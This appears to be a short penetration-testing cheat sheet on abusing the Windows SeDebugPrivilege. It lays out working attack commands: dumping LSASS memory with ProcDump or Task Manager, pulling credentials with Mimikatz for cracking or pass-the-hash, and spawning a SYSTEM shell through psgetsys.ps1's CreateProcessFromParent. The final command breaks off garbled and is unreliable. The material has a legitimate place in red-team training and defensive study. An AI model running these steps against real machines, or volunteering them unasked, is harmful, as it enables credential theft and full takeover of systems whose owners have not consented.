SeDebugPrivilege

About

SeDebugPrivilege allows a user to debug system processes without being a local administrator. By default, only administrators are granted this privilege as it can be used to capture sensitive information from system memory, or access/modify kernel and application structures.

• Assigned via Local or Domain Group Policy:

  Computer Settings > Windows Settings > Security Settings

Dumping LSASS

We can use ProcDump from the SysInternals suite to leverage this privilege and dump process memory. A good candidate is the LSASS process, which stores user credentials after a user logs on to a system.

Or we can dump it with Task Manager -> Details -> lsass.exe -> Right-Click -> Create dump file

C:\> procdump.exe -accepteula -ma lsass.exe lsass.dmp

Then we can use Mimikatz to extract NTLM hashes from and crack it, or use it for Pass-The-Hash attack

C:\> mimikatz.exe

mimikatz # sekurlsa::minidump lsass.dmp

mimikatz # sekurlsa::logonpasswords

RCE as SYSTEM

We can exploit SeDebugPrivilege to achieve RCE. This method allows us to escalate privileges to SYSTEM by spawning a child process and leveraging the elevated rights granted through SeDebugPrivilege. By modifying standard system behavior, we can make the child process inherit the parent process's token and impersonate its privileges.

1. First we need to transfer script [LINK] to target. Then we need to find a process that uses SYSTEM:

PS:\> tasklist 

1. After we found PID we need to use that command:

PS:\> .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(612, "c:\windows\System32\cmd.exe", "")

1. Or we could use GetProcess cmdlet to bypass looking for PID, for example we could use lsass.exe

PS:\> .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(Get-Process "lsass".Id, "c:\windows\System32\cmd.exe", ""cd C;